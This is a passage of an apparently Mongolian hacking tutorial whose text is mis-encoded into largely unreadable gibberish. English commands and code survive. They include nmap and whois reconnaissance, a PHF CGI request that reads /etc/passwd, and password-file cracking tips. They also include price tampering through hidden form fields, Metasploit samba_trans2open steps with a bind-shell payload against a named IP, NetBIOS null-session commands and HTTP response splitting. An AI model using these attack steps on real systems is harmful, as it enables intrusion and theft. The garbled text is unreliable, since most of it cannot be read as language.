eaep:y:aMaMsapanaaaxaparnaaar.XnaM:anxaasvcaxaacaxnaaan, ra:anxy:raMaaussapnMaaaxvuanaxxv:ausaacaronaor.Yvu:a aannaap Web browser-r cau Myy ans u sopnnroop amnrnax onaor.AnnaaanporpaMasMapuaranaaaykyuvxsaaaanaaar.Yvunr apxonuoraaaryrarvxeaenMepmaapacauaxnnaaar.3apnMaaa arasaparsansxaparnaxrvonaMsapanaxauvvaaarmvvaaa. Xnmaanan, :a uap Chessmast er10 rax :ornooMbr Maaax ax. Bn sax u xnuaaraaaxaMrnueuaepsapar:aChessmast er-nrusxoxnxuaaaxrv acau kM. Taraxaap us n xoxnx onox uvx xax axannaa. Yaanrv n Chessmast er-nr us aapaanau 10 yaaa xoxcou kM. Xoxnxoop eeaeec uar cep:ndnka: eraer kM aua naa. HaMar sax xoxcou rax oaox aua?Bnnxaurnuapraxaparnacauusnaaa.Chessmast er-:a:ornoxaoo uarnrus1Mnuy:aaap:aasunxcaukM.Chessmast er-nuuarnr :vpvvnxayycraxsopnnro:o.Huraaann:apcep:ndnka:brxvccau :ooroopooaauonxaraakM.Haaaama:pbunxaassacaxrvu :vvunanaaaramnrnaaaxoxunxyxaauauaraaarunusonxaraa ns aaa.I nt ernet Explorer-aDHTNLMe:oaonoxcreateTextRange()us xakepyyaaakoaooaxnyynaxonoMxonroaoruaruvxkMaua.Neu RDS.Dataspace ActiveX kou:pon us Meu nM anaaa:a kM aua. 3ua Ma: anaaa xauran::a nx araa xapnu aaraap uvxnr svraap uar Maaax nm kyua amnrnaxaa n cau Maaaar ax xapar:a.BaxakepaaxMamonouapraaaar,xnmaananaanuvuacau koaoua eepunen: opyynax apra. 1998 oua Hx Bpn:aun Xakep 300 opunMaaxyyaacub:ekc:nrconsx:aascau.Baxakepaaxapryyabr:epneep us snrax nuaan:Aut hent icat ion:Brut e Force aapan:Xauran:rv Aut hent icat ion48Nyy uyyu vr couron:Aut horizat ion:Session amnrnaxXauran:rv AuthorizationXssraapnan:rv SessionSessioneepunexKnneu: :anbu aapan::Cont entSpoofingCross-sit e Script ingKoMMaua:a aapan::Bydep avvpaxTaMaar: Mepnu anaaaLDAP I nj ect ionOS inj ect ionSQL I nj ect ionSSII nj ect ionXPat h I nj ect ionNaaaanan nnpvvnax:Bnpek:opbu xarcaan: Naaaanan xynranax, onx aaaxBnpek:opbu saM xeex1anbu apnan :aaMarnax onox Pornk aapan::1yukunr eep sopnnroop amnrnaxDenial of Service (DoS)Defautyky aa:oMa: :oxnprooPornk anaaa:a vnaanBa xakepaaxbu :yna epeuxnaee aapaax anxMyyabr aaMxnua. 1. 3xnaaa System network scan xnua2. Bapaa us xanaax apraa courouo3. Cnc:eMa uaa:apu syslog-nr sorcoouo4. Log-ooc eepnu!P vxn Maaaannnr yc:raua5. Backdoor kMyy Rootkit cyynraua6. Jargon-ooaxanua... Jargon raaar us Xakepyyabu xan rax onrox onuo. 49Xakepbu rapbu vcar:Xapaa:auaaryynnarae-commerceca:xaparnaaaron xananarbu :oo ynaM n nx ax onuo. Hxaux xananara Common Gateway !nterface(CG!)nyyunrnacauaaar,aapaausTCPnop:kM.Cvvnnu vea!NAP-ramnrnaxStormaapan:xnxusnxcaxaraaracau c:a:nc:nkrapcauauanaa.Bapan:bu:ooroopooAHY,OMuea Conouroc, svvu Eaponbu opuyya :aprvvnx aua. Ourepceu oua n raxaa AHY-nu koMnaunyaaa un: 266 cas aonnapbu xoxnpon yupyynxaa.Neu cepaep onou nporpaMyyaaa Mam onou backdoor (apbu xaanra) aaarereeaUN!X-nuuarbackdooronls"koMMauadanbu xarcaan:brxapyynaar.Amnrnacau:oxnonaonaxyascaruusnunraax vnaaar. SSH-nu(secureshell)backdooronxaparnaxaraaxaparnarunu :yxaMaaaanannunxaaaaronoaulogdanaaaanarasapxaaranax xapar:a. Ba xakepayynax ron vuacvvanu uar us backdoor onaor.FootprintingaScanningonxakepaaxvuacauanxaM.Bapax oek:buxoo:yxavpauavvpauMaaaananuyrnyynxaxcasaapax xapar:a.Whois,AR!NonaoMauuapnu:yxaMaaaannnrerue. Traceroute a mail tracking us Spoof xnxaa xapar onuo. Footprinting sr 50:oaopxo ax xapar:a aua us sMap uar kM xnxaacaa eMue :aruyynaax sopnnro:o.NmapnporpaMuaMaxapar:aMaaaannvvaaaaaaxaa:yc onuo. KyubeMueaapaxoek:buxooaoMauuap,cvnxaaunnok, cvnxaaunvnunnraaaannnnkemuyya,cnc:eMnuapxn:ek:yp, xananaraxsuaxcnc:eM,!Pxasr,uaa:pauopoxsaMonouxapar:a Maaaannnuxarcaan:,y:acubayraap,xapnnuaxxasraaraapnrMaaax xapar:a.Hop:yyabruaruax,SYN,F!N,Connect,ACK,RPC,FTP,!dle Scan-yyaaap:ypmnx.Ansnop:uaan::aaraaraacxaMaapuxanaax apraa courox xapar:a onuo. Harronxaparcanonwhoisererannucau,whoiscauraacaoMau uapnropyyncuaapaaMnunc:pa:op,asaMmnrunuxasry:acubayraap onou ycaa Maaaannnu :yxa aanrapaurv Maaax onaor. araaa raaan aoMau uapnr xau asaMmnx araa us vraaa nn ax c:o racau onou yncbu avpaM aaar.Linuxvnannucnc:eManuraxxapaarnporpaMauxuaacaa cyynraac:aaaar.Xapnuanaap:Windows-:onaxrv.DNS-nu :yxa Maaaannnr nslookup amnrnax aau onuo.C: \ > nslookup www.google.comServer:dnsr1.sbcglobal.netAddress:68.94.156.1Non-aut horit at ive answer:Name:www.l.google.comAddresses:64.233.187.99,64.233.187.104Aliases:www.google.comRegist rant :Pearson Technology Cent reKennet h Simmons200 Old Tappan Rd.Old Tappan,NJ 07675USAEmail:billing@superlibrary.comPhone:001-201-7846187Regist rar Name....:REGI STER.COM, I NC.Regist rar Whois...:whois.regist er.comRegist rar Homepage:www.regist er.comDNS Servers:51usrxdns1.pearsont c.comoldt xdns2.pearsont c.com3a sMap u acau aaraap Maaaannnr aacau on oaoo AR!N whois-aap uaropooaxaps.192.1/.1/0.1/-rAR!Nwhoispvvnunxaaaapaax Maaaannnr yuaax aanaa. Ba ca: us www.arin.net . OrgName:Universit y of I llinois OrgI D:UI UCAddress:1120DCL,MC-256Address:1304 West Springfield AvenueCit y: UrbanaSt at eProv: I LPost alCode:61801Count ry:USNet Range:192.17.0.0 - 192.17.255.255CI DR: 192.17.0.0/ 16 Net Name:UNI V-I LNet Handle:NET-192-17-0-0-1Parent :NET-192-0-0-0-0Net Type:DirectAllocat ionNameServer: DNS1.CSO.UI UC.EDUNameServer: DNS2.CSO.UI UC.EDUNameServer: DNS1.I U.EDUComment : RegDat e: Updat ed: 2004-02-18RAbuseHandle: UI UCS-ARI NRAbuseName: UI UC Securit y RAbusePhone: + 1-217-265-0000RAbuseEmail: abuse@uiuc.edu RTechHandle:CK185-ARI NRTechName:Kline, Charles RTechPhone: + 1-217-333-3339RTechEmail:kline@uiuc.edu 523uaaacaapaxoek:Maaus25+xasr:a,192.17.12.1-ooc192.17.12.254 / 24 xvp:an.Oaoo vpranxnvvnaaa Tracerout e xaparnae.Tracerout eonaapaxoek:busaMbr:oaopxonoxsopnnro:o. Linux traceroute us UDP aaap, Windows us !CNP aaap cyypnnaar. C: \ > t racert192.168.1.200Tracing rout e t o192.168.1.200:1 10 ms < 10 ms < 10 ms2 10 ms 10 ms20 ms3 20 ms 20 ms20 ms192.168.1.200Trace complet e.Boa:noxraxaraaMamnuMaausacaan::aaraaacaxnr Maaaxnu:ynapingnnraaxaaonuo.BapaaxnporpaMyyapingsweep aryyncau araa :ypmnx vsua ns.- Angry I PScanner- Pinger- WS_Ping_ProPack- Net work scan t ools- Super Scan- NmapHop:uaruaxraaarusTCPaUDPnop:oopkyxnxsMapnporpaM axnnnax araar us :or:oox sopnnro:o.BanuxaMraanan:raaarvuaxaap:oMacyyaan,Hu:epua:onMam :oMcvnxaa:vvuaMamonou:ooubuvxaraa.KyubeMuexapaa:a Nicrosoft!nternetexplorerxaparnaaaronPrivacy-rHigheronrox xapar:a. Xvunuyyuvrnronoxonouapra,nporpaMaaar.Ta:apxvuaa cau Maaaar on :epceu eaep rax Ma:aap :aax onxonuo. Neu uyyu vr :anaxaa Dictionary attack xaparnax onuo. 3ua us vrnu xarcaan: ax ereea:oxnpoxvrnron:onxapsuyynxxeexonuo.3caanhybridapra ax onuo. 3ua apra us eMuex:a oponuoo ereea ron us aaap us :oo onou:ycra:aMaar:uaMxopyynaaronuo.OaooxvMvvcuyyuvraa caxpyynaxbu :yna :oo xonsx opyynax us nx oncou. 533caan cookies xynranx onuo. Boa:noru koMnsk:epaac unus cookie xynrancuaapuyyuvr,xaparnarunuuapraxMa:svncnronxaaax onoMx:o. Ep us aua :auaxnu ca: vsax axaaa Mnun xaparnarunu uap,uyyuvrnrxaaranracau:oxnproorxnxusxaMrnuapcaan:a anxaM kM. UI D= bWlrZTpt aWt lc3Bhc3N3b3JkDQoNCg;expires= Fri, 20-Nov-2006YvunrxapaaaxvukyuonroxrvonoauBase6+decoderaxaa mike:mikespassword raaa n rapaaa npua aaa.Java-r v:aacau Sun kopnpaunuxau Ba annnnkemuyyabu 95 us sMapuaruvx:aaaar"racauavruan:xnxaa.Baca:yyabuxanaax onox uvxnr xyanap xapaan: Cross-sit e script-80% SQL inj ect ion -62% Paramet er t ampering - 60% Cookie poisoning -37% Dat abase server - 33% Web server - 23% Buf fer overflow -19%- XaMraa ax xanpnarap op1por 10 avx -N Windows cnc:eM Unixcnc:eM1. I nt ernet I nformat ionServices BI NDDomainname syst em2. MicrosoftSQL ServerRemot e Procedure Call3. Windows Aut hent icat ion Apache Web Server4. I nt ernetExplorer Aut hent icat ion Account s wit h No Passwords or Weak Passwords5. Remot e Access Services Clear TextServices6. MicrosoftDat a Access Component sSendmail7. WindowsScript ing Host Simple Net work Mail Prot ocol8. MicrosoftOut lookSecureShell (SSH)9. Windows Peer t o Peer File Sharing (P2P)Misconfigurat ion of Ent erprise ServicesNI S/ NFS10. Simple Net work Mail Prot ocol Open Secure SocketLayer(SSL)54- XaMraa ax xanpnarap op1por DOPTYYB -1. Hop: 80 (Web/ HTTP) - 45.54%2. Hop: 13/ ( Net BI OS) - 20.22%3. Hop: 1+3+ (SQL)- 13.68%4. Hop: 1985 (HSRP) - 3.52%5. Hop: 138 ( Net BI OS) - 3.38%6. Hop: 25 (SMTP) - 3.37%7. Hop: 161 (SNNP in) - 3.34%8. Hop: 162 (SNNP trap) - 3.26%9. Hop: 21 (FTP) - 1.75%10.Hop: ++3 (HTTPS) - 1.55%- Cepaep conax apra -XaMrnuaurnucounpxon:oapraonaoMauuapnreepcepaep nvvxonoxkM.Xnmaanannwww.hacker.mn-rxakepaaxaapmnanaa raxoa.Faauauaca:xaMraanan:ca:aMnunMaaaxapryyaonoxrvaaansaxaa?3uaaaca:brxakepaaxuaaaxrvusraaa opxnn:ousnmaaa.TaraxaapaaapaypacauapraapxakepacauMa: xaparaaxaconuo.3xnaaansMapuarcepaepxyaanaaxaaaaa nameserver-nrus:aMaarnaxaaaaacepaepaaconnxoncou:ynaapaax cepaep nvv xonox erue vv racau n-Mannr aoMau uapnunameserver consx uaaax apx Maaan:a aryynnara xyas xvu pvv nnraaraaa n onoo. Oaoo uarau: eepnu cepaep aaap araa kM unus ao:op us ky u rax nucau onuo. Xakepacau Nongolian Hacker Team 2006"racau nunr opxnunxuo.XvMvvcwww.hacker.mnca:pyyopoxoaeeaeecusnMnunr yr:ax ereea 3ua ca: xakepayynunxax, aua xakepacau ar sMap narkMa?"nraxoauo.Xapnuvuauaaaonxnuxauaaacepaepnr xakepaaarv ereea xnuxaua aa Maaus ky u eepuneraeerv xaaaapaa n axaxonuo.XapnuasaMmnruasaaaxnaaaraxaxaxnaaa. Xapnu yaaxrv onrooa yuaaraaa consunx onuo. 3ua on Xakepaax onoMx Mam onou ereea xakepaaua raxaap nop: manraaa uvx xax u kMyy :nMapxvv svnnr vpranx n:rn oaox a racauvrkM.KoMnsk:epnucnc:eMnuuvxuaacraauaxvunvn axnnnaraaub uvx rax aaar ereea aua vranr onx xapx uaaaar ax xapar:a. 55Xspxsa xaMraanax as?Bnauaac uar nx xaMaapaxrv aaa. Fonayy aoMau uapnu nameserver-nrconsxuaaaxapxMaaan:axvMvvcaacnxaMaapua.HManM vnunnraasayynaararyynnaraxyasxvMvvcxyypaMun-Manaac onrooMxnox xapar:a. Bonx eraen a:anraaxyyncau us xau xauaaa aaap mvv aaa.- Buf f erOverf l ows -Baxakepaax:yxasMapuuoMbryumcauxaMrnuaxauaydep avvpraxaprbrnucauaraa.XaMrnuauxub:oMexploit us1988oua rapcaunu:epua:e:(worm) acau. Bydepavvpraxraaarusydepbu aau uaaax xaMxaauaac nnvv ererannr ydep pyy xnxaa vvcua.3uaanaaausMaccnabuxaMxaauaacopyyncauMaaaananxa:apcau acaxnrmanraaarrvCxanaaap:oxnonaaor.CxanaaapMaccnaus c:a:nkacaananuaMnkaapsapnaraaar.C:a:nkxyascaruusererannu cerMeu:nuxacar:auaanxaxnaxsauaacauaxouxacrnraau axnnnaua.BnuaMnkxyascaruusaxnnnacubaapaac:ek:cauaxou xacrnraauaxnnnaua.Fonayyaoopxdyukuyyabramnrnaxydep avvpraaar.st rcpy ( char * dest , constchar * src)st rcat(char * dest , constchar * src)get s (char * s)scanf (constchar * f ormat , )printf (conts char *format, . ). rax Ma:.XnmaanannMkoaanaaraxoaoxoa16yp::aydep:256 yp::aMaaaananuaMaxaapMaaaaxanaaarapu:aapua. 1yukuyuaxaaa aapaarnu vnanaa yumnx uaaaxrv yunp anaaa saax araa kM. Taraan aua aapaarnu vnaan aaap us eepnu Shell koaoo axnyynaxaap saaraaa erunxaer.Huraaan:aapxaaonxaaua.Faxaaaauaaprbrxnxnu:yna koMnsk:epnucauaxou:anaapcauMaanar:aaxxapar:a. Expoloit -oonunxuaaaxrvonanauexploit seuaeeaaaronoxoop onx aaaaa axnyynaaa ax aaa.# include< st dio.h># include< st dlib.h>void f unct ion( char* st r) {56char buffer[ 16] ;st rcpy(buf fer,st r);}void main() {char st ring[ 256] ;inti;for( i =0;i < 255;i+ + )st ring[ i]=' Z';funct ion(st ring) ;}Xspxsa xaMraanax as?AkynrvxanaaapnporpaMaanunx,JavaxanaaaponnManaaa rapaxrv. Koaoo usr:anx manrax xapar:a.eEye Retina, !S!C rax Ma: uvx manraru amnrnax onox kM.- For matst r i ng anpaa -Aux 2000 oub 6 capa auaaprbr Maacau.Op:aer dyukuyya us printf, fprintf, sprintf, vprintf, vfprintf, vsprintf rax Ma:.intfunc( char* user) {fprint f( st dout , user);}Xapaauser=sssssss"raaanacyyaanvvcaxaxanx araa kM aaa. Huraaan user = n" vp u nx acyyaan vvcraua aaa.3ua anaaar us nurax sanpyynx onuo.intfunc( char* user) {fprint f( st dout , %s ,user);}57- Bs xyypacaaac asa1psx spx xax -AnnaaasMapuaaxyyaacubaaMnuaapuaa:paxraxaa eeaeecxaparnarunu uap uyyu vr xopbr acyyaar. Ta :aua sMap u xaMaarv kM nuaaaerexeaeeaeecxaparnarunuuapacaanuyyuvrypyyaua racauanaaaerarnrxvuvpMaaua.Bnaunerceuxyaanxaparnarunu uap,uyyuvrvuauacaxnrmanraxbu:yna:yxauaaxyyaacuaauaa xnuxaua xaparnarunu uap uyyu vrnu uar rasap xaaranaar ax :aapua ns. 3uaaac :a :ap uyyu vr:a danbr onooa aaunxaan onox kM aua raxoaoraoxauayy?Naaaaxaaxnxaraaxvuuracauvvunr Maaax yupaac sus vpnu apraap uyyxbr xnuaax onuo. 3ua uyyu vr :aax onox acaan brut ef orce xnx :yxa nm svraap myya uyyu vr:a danbr onox :anaap sypraap :anapnas. 3xnaaa :yxau aa xyyaac vsaxaaa sax axnnnax araar xaps. / cgi-bin/ show?../ ht ml/ apps.ht mlTaraxaapauaaanuxyyaacuyyabr vsaxnu :yna show-r amnrnaaar kM aua. 58AaMnubnornuxnaarxacarauaaua.3uaxyyaaceepaaapaa xaparnarunuuapuyyuvrnrmanraaarxacrnraryyncauax:aapua. Faxaaauyyuvrxaparnarunuuapauaxyyacauaaaxaaranaraaxaraa rax n oaoxrv aua.HMaac:vvunao:opxkoabrxapxxaauaacxaparnarunuuapuyyu vraaaauaraarxaps.XapnumyyavsaanMaaaaxHTMLxanapaap paysepnyyyuaxyupaacnPHPkoabrusxapxuaaaxrvkMaua. Tvpvvunu show-nr amnrnaaa vsse.Bo:poocusnsecure.phpxyyacbrincludexncunronnoo.3yprau aaapaa:axapxaraansaaa.HyyuvrxaparnarunuuapaaxvMvvc ronayy includeao:op php.ini danaaa xncau aaar.59OaoophpSecurePages/ secure.phpouronroxvsaaa:axapaaa. Bnaun xacau svn onanoo. Oaoo Pornu xyyaac pyyraa mnnxaaa onacou xaparnarunu uap, uyyu vraaxnraaavsaaa.3a:aoaooAaMnubapx:aonnookyxnMaap aua aaa. Xakepacau :ap rax nunx vv...60- UNIX cac1eMaa ayyu vr 1anax -3xnaaaUN!Xcnc:eMnukoMMauabrMaaaaraxxapar:a.Hxaux DOS-nukoMMauaUN!X, L!NUX-nux:a oponuoo aaar.3apnM uyxan racau koMMauabr nunaa. HELP =HELPCOPY =CPMOVE =MVDI R = LSDEL =RMCD =CDCnc:eMaeepxauaraarxapaxbu:ynaWHOkoMMauabramnrnax onuo.Xaparnarunu:anaapMaaaananaaaxbrxvcaanFI NGER < username> rax nuua. UN!Xcnc:eMxaparnarunuuyyuvrnr/etcracauuap:aanpek:op: passwd uap:araap xaaranaar. Faxaaa :a :ap danbr ouronrooa n uyyu 61vrvvanraaunxuaraxoaoxaraaonauayypuaa.Yunpuspasswd danencrypt-naracauaaar.Taaraapuyyuvrnrmyyadecryptxnx onaorrv.TanaxaapmnacauonxaMrnucauuyyuvr:anaru CrackerJackraaarnporpaMonouvrnucauamnrnax:anaxbrseanex aua.3uausnaunxonoxerceuvrnucauaaxsvrvvanrencrypt-naaa, ueree uyyu vr:a xapsuyynaar.Cnc:eMauaa:apuuyyuvr:adanbronoxxapar:aonxaua. Hyyu vr:a danbr aapaax 2 apraap onx aau onox kM. 1. 3apnMaaa/etcanpek:opbrFTP(FileTransferProtocol)-c noknoorvaaar.Anonymousapxaapuaa:paxaauyyuvr:adanbr xaparaaxaaprvxssraapnacauaraa.Xapaaxssraapnaarvonsvraap :a:ax aaaaa n ueree nporpaMaap :anaaa n onoo... Xapaa xssraapnacau on 2 aaxs apraap vsax xapar:a.2. 3apnMuarcnc:eMacgi-binanpek:op:PHFdanaaar.PHF danusxaparnarunrremoteaccessxnxonoMxnronroaor.Ba paysepaaapaaeepnuaoa:noxraxyaanuxaaurl-raapaax:a aannaap :aanaa vs. ht t p: / / www.hacker.mn/ cgi-bin/ phf?Qalias= x%0a/ bin/ cat %20/ et c/ passwdBaapx2apraaponxuaaaarvoneepycaaapryyasMapuacau aaar raarnr xanse.Xapaa eMuex apryyaaap onx uaacau uao:opxus X" acaan !"acaan *"racau:aMaar:vvaaaanuyyuvr:adanMaausshadowedaua racauvr.ShadowraaaronXakeponouxvcaarvxvMvvcuyyuvr:a danbrasaMmnxaacxaMraanxxnaaruarapra.XapaMcan:ausna unshadowxnxuaaaxrv.FaxaaasapnMaaauyyuvr:abackupdanyya shadow xnraaarv aaar. Yvunr /etc/shadow saMaap xapx onuo.Xapaa:auyyuvrnrrap:aaopyyncauoneepnutelnetclient-nr aapaxraxaraacepaep:axonoraoxoopaxnyyn.Xaparnarunuuap uyyu vraa xnaar uoux rapu npua. Uaamaa :aua onroMx:o ns.Xspxsa xaMraanax as?axauaaapan:aacxaMraanaxonroMx:oaraaax. Epeuxnaee on xakepaax raaar on sMap uar anaaar amnrnaua racau vr. TnMaacaaapxanaaauyyabrrapraxrvaxaanonoxkMaua.Map uveauyyuvraaMamxauvv:anaraaxaaprvcouroxaxbr:aua eepnuxee svraac seanex aua.62- Soci alengi neeri ng -SocialengineeringraaaronxvMvvcnuycaaan:raxn:ranonou xauraaanbramnrnaaaruarauaprakM.XvMvvcsMapuaruyxan MaaaananvxndopMernexaee,uaaaap:aaanbruscau ausaapaarrv.Xapar:aMaaaannaasvraaperneeasayynunxaar,ra:an sapnMbux us uaaua xakepyyabu anacau ypxn aaar. Socialengineering onxaanraapnporpaMonou:exunkuscauxaMraanan::aacauu xvMvvcnucyn:ananaaaramnrnaxcnc:eMauaa:paxonoMxoo nxacraaarsvnkM.KoMnsk:ep::ynryypnacausansonouxvun anaaaua:ynryypnacausansraxao:opusxop:epenonrouaurnnaar. XnmaananPaypal-nu:aMaarnaraaramnrnaxxvMvvcnun:rannronx aaaaa:vvuaaaxvMvvcnukpean:kap:buMaaaannnruyrnyynaarca: onou aaar. 3ypraap :anapnaaan:Troj anhorseonSocialengineering-nuuar:epenonaor.us vpnu n-Mana xaacparaax npcau sypar rax Ma: danyya ao:poo vvunr aryynxaaar.3uausdanbrvsaxveanaaaxxnx,:aubkoMnsk:ep: uyyuaapcyyx:aub:yxaMaaaannnrXakep:erexonuo.`!LoveYou' anpyc a `Anna Kournikova' aopMyya us vvun :oa xnmaa kM. 63Socialengineering-aacxaMraanaxapraonaua:yxaeepnu Maanaraacaxpyynax,xaparrvn-ManonouvuarvnporpaMyyabrkoMnsk:ep:aacyynraxrvax.HxauxvuarvnporpaMao:pooTrojan aryynxaaar.Neususvpnuuacauaxvparuaaasopnyncauca:aac kM :a:ax aaaxrv ax xapar:a. Hyyu vraa aua :aua xaaranaxrv ax, :anaxaa xauvv vr erex xapar:a. - Phi shi ng -Phishingon aukub onou e-commerce aa ca:aa aoa:onaor apra. Hapuaacusxapaaa:auaauavropxnpxaraaaxfishingyky saracunax racau vr:a y:ra us oponuoo. Xaparnarunu Maaaanan, kpean: kap:buMaaaannnronxaaaxsopnnro:oaaar.Phishingonsocialengineering (onou aMxnn::a xakepaax npouecc aurnu uyyu vr acyyxaac axanaar) amnrnax saaan kM. Map uar n-Man saxna kMyy, aa ca:aap aaMxyynxnnukaap:aaunMaaaannnraaaxsopnnro:o.BnauncnaM rax uapnaaa aaar saxnauyya sapnM us ao:poo vvunr aryynx aaar.Xnmaa: Rite uap:a anek:pou aukub vnunnraauaac a:anraaxyynax n-Man npcau Ma: xaparaax aua.support @rit ebank.com -NoticeofAccountReviewNecessity!Facau y:ra vxn n-Man npxaa. 64H-Man ao:op opooa vsaxaap Click here to verify your account" racau nunraua.3uausauaaapaaaeepnreea:anraaxyynuayyracau y:ra:a.Boopc:a:ycaaapxyypaMuxasrpyysaaxraxaraaus xaparaax aua. Faau xaparnaruna nxauxaaa vvunr ausaapaarrv.Xaparnarunaaua:yxaMaaaananca:aoneepnuMaaaannaa anaaxrvaa,xapnuMaanarMyy:araacaaonxuyxanMaaaannaaanaax xoxnpox saaanrapaar. Phishing-nu uar xyannap on xvun n-Mannu uyyuvraaaxaprakM.Xnmaaus:aYahoo-rnun-Manxasr:aax, ra:anuareaepYahoo-rnuuapnueMueec:auan-Mannpaxonuo. Yvuaus:an-Mannuuyyuvraaconnxrvyacauaua.Akynrv aanbuvvauaacauannukaaapaapaaauyyuvraaconnuoyyracau aaar.TyxaunnukaaapaapaxaaYahoopyyopxaraakMmnr xaparaaxonoauvuauaaaXakepbuanacauypxnpyyopaor.Taua:a xyyunuonoumnuauyyuvraaerneeasayynauryy::apusxakep:npx, 65Xakep:aubeMueecn-Mannuunusuyyuvrnrconsunxuo.Ta:araaa mnuauyyuvraapaaopooaaxnaxyupaackyuausaapaxrv.Taraaa:aub n-Mannu uyyu vr:a oncou Xakep ky xvccauaa xnua mvv aaa. Honsm yncaacypaaruaruasMaausnMapraapn-Mannuuyyuvraaanacau ereeayuaaxuyyuvraaonxaaaxaaao:opxvxn-Manvvanrus yc:raunxcauacau.Oepxaaauxvuuauaapraaep:exxoxnpcubrn Maaaxrv. TnMaac capaMxnvvnax vvauaac vvunr nunaa.YvuaaccapaMxnaxnu:ynauarsvnnrauracauaxxapar:a,uap xvua:aca:yyaxasaaunMy:ra:an-Mannnraaaarrv.Taraaa xasrnr us sea acaxnr cau xap, xasrnu opoua !P xasr :aascau aaan Ho"-:o rax onrox xapar:a. NeuaoMauuapnraannxauaauxyypax:oxnonaonaaar.Xnmaa usht t p: / / www.hacker.mn-nrht t p: / / www.hakcer.mnracunrxaparnaru ausaapaxrvaxonuo.Backpean:kap:onou:vvu:aaann:rax MaaaananernexaxaaaSSLamnrnacauacaxnrsaaaanxapax xapar:a. SSL 100 uaaaap:a nmaa, xakepaax onoMx aaar.Neu NouronaxaanraapaxrvunMsvnaacxaMraanaareepxopsvn aaar.FaxaaaxvccauonrouusSSL-nrxakepaaxuaaaxrv.3uaon Tokens a Smart Card. Nouron yncaa Smart Card-:a onro rax xvMvvc spnaaaraarauxaapaxaannvvaaxrvaxaa.Banxnuxerxneec xoupooa saxaa.66- OopMma ayyu 1anap -1opMbu uyyu :anap (hidden fields) on sapnMaaa xaMrnu aMapxau Xakepyyaaa ep:aer svnc. Xnmaa us: < I NPUT TYPE= HI DDEN NAME= "name" VALUE= "Dell PC">< I NPUT TYPE= HI DDEN NAME= "price" VALUE= "$500.00">< I NPUT TYPE= HI DDEN NAME= "sh" VALUE= "1">< I NPUT TYPE= HI DDEN NAME= "ret urn" VALUE= "ht t p: / / www.hacker. mn/ cgi-bin/ cart .pl?db= st uf f .dat &cat egory= &search= Dell PCs&met hod= &begin= &display= &price= &merchant = ">< I NPUT TYPE= HI DDEN NAME= "add2" VALUE= "1">< I NPUT TYPE= HI DDEN NAME= "img" VALUE= "ht t p: / / www.hacker.mn/ images/ c-14kring.j pg">Koaacauraxoa. 3xnaaaxyyacbrxaaranxaaaaa$500.00-nr $2.00onrooakoaoo refreshxnraaa axnyynaaa vs.Ta oaoo2 aonnapaap Dell PC aaax onoMx:o onx aua.< I NPUT TYPE= HI DDEN NAME= "name" VALUE= "Dell PC">< I NPUT TYPE= HI DDEN NAME= "price" VALUE= "$2.00">Xspxsa xaMraanax as?Yua onou :vvu:a aann:rax Maaaannnr knneu: :an aaap xasaa xnx onoxrv, aauaaa ererannu cauraac :a:ax xapsuyynaar ax xapar:a.- Sambaamarnaw expl oi txax -Ta vuaxaapcauXakeponooaaanxnuvxkoMnsk:epnryu:paax:yxa oaox axanan,vvunr n :auar xaMrnu cauaa rax xanax aua. araaaraaan:aI SP-:araauxonoraoxuaaaxrv,n-Manaaumanrax onoMxrv,sMapuaaca:vsaxuaaaxrvaxonuo.3uaaauavv y:rap:a nm rax vv? Taraxaap sMap uar svnnraaaaxaacaa eMue aua svn axrv onunxaon n sax aa? rax eepeecee acyyx araapa.BnakoMnsk:epvvanuxoopouadanaaMxyynaxaaaFTPnpo:okon amnrnaarnrMaaua.TaraansapnMpaysepyyavvu:aaannSambarax uapnaraaar smb:// npo:okon amnrnax onaor. FTP21 nop:br amnrnaaar on Samba 139 nop:br amnrnaaar. 3xnaaanaauaaapaxkoMnsk:epnuxaanop:brmanraxbu:ynanmapraaarnporpaMxapar:a.Xaauaac:a:axaauonoxbrxaacpan: 67xacar: araa. Ta:ax aau cyynraaa Windows-nu cmd.exe-aap axnyynaaa vvunr nu: nmap -sS -sV 156.154.22.1 -254 - p 139 3ua:a eepnuxeeaapaxraxaraakoMnsk:epnuxaa!Pxasrnr nuua raarnr onrocou ax. 3uaaacSamba3.Xaxnnnaxaraa1xoc:onanoo.Oaoo:araxaap exploitxne.Yvun:ynaWindowsaaapaxnnnaaarframeworks2.3 xapar:a onuo. Bapaax xasraap :a:ax aaaaa cyynrax onoMx:o.ht t p: / / met asploit .org/ t ools/ frameworks-2.3.exeAxnyynaxaap ao:op us +6 exploit araa, naaua samba _trans2open xapar:a. 68Bapaxoek:buvnannucnc:eMusLinuxon0,FreeBSDon1 rax nuua.setPAYLOADl i nux_i a32_bi nd rax nuaaa aapaa us.show opt i ons setRHOST 156.154.22.12setRPORT 139setLPORT 4444expl oi trax nu.69- Net BI OS NULL sessi on -OaooNetB!OS-nuuaruvxonoxNULLsessionapraapxakepas. 3xnaaa cmd.exe-raa axnyynaaa aapaax aanaap nuua.netvi ew \ \ 156.154.22.15 (3ua eepnu aoa:nox !P xasraa nuua)Accessisdeniedrauaa...Oaoo:araanNULLsession-nanaaar amnrnaxaac.netuse \ \ 156.154.22.15\ I PC$ / U: rax nuaaa vs.70Haa:apu uaanaa, oaoo eMue nucauaa aaxnx nuaaa share xnua aaa. 3ua rauuxau root uap:a asaMmnru n aua. Taraannetuse M: \ \ 156.154.22.15\ rootOaoo cmd.exe rapraaa N:\raaa n nuunx, ky rapx npaxnr xap.3a :a oaoo ky xnMaap aua vvu aaap...71- HTTP xapayn1 oopunox -HTTP:onrouMaaaananeepunen:opyynaxbrkem-uapyynax,cross-sitescripting,hijackraxuapnaaar.3araapapryyabraanrapvvnxvsax onuo. Xnmaa us aapaax koabr sayyncau rax vsse n aaa. St ring aut hor =request .get Paramet er(AUTHOR_PARAM);Cookie cookie = new Cookie("aut hor", aut hor);cookie.set MaxAge(cookieExpirat ion);response.addCookie( cookie);Xapnyn: aapaax aaan:a npua.HTTP/ 1.1 200 OK...Set -Cookie:aut hor=JaneSmit hXapaa Xakep NGL Hacker\ r\ nHTTP/ 1.1200OK\ r\ n... aaapx Mepnr uaMaaa opyynunxaan, nM onuo racau vr. Set -Cookie:aut hor= MGL HackerHTTP/ 1.1 200 OK...Xnmaasypraapshopliftxapxauxnarnrxaps.3uaxs:aabuuare-commerce ca: aua. Bnaun courocou apaa 1290 racau vua:a aua. 72Oaoo :araan vunr us 1290-nr 1 onrox consx nuse...Xapxauayy?HMaaanaopoxrvu:ynaaaaaxnxaaacau oaox xnraapa.73- DoS Bapan1 -BaapnunracauapryyaaacsapnMbrusoaoovsaxonuo.XaMrnu 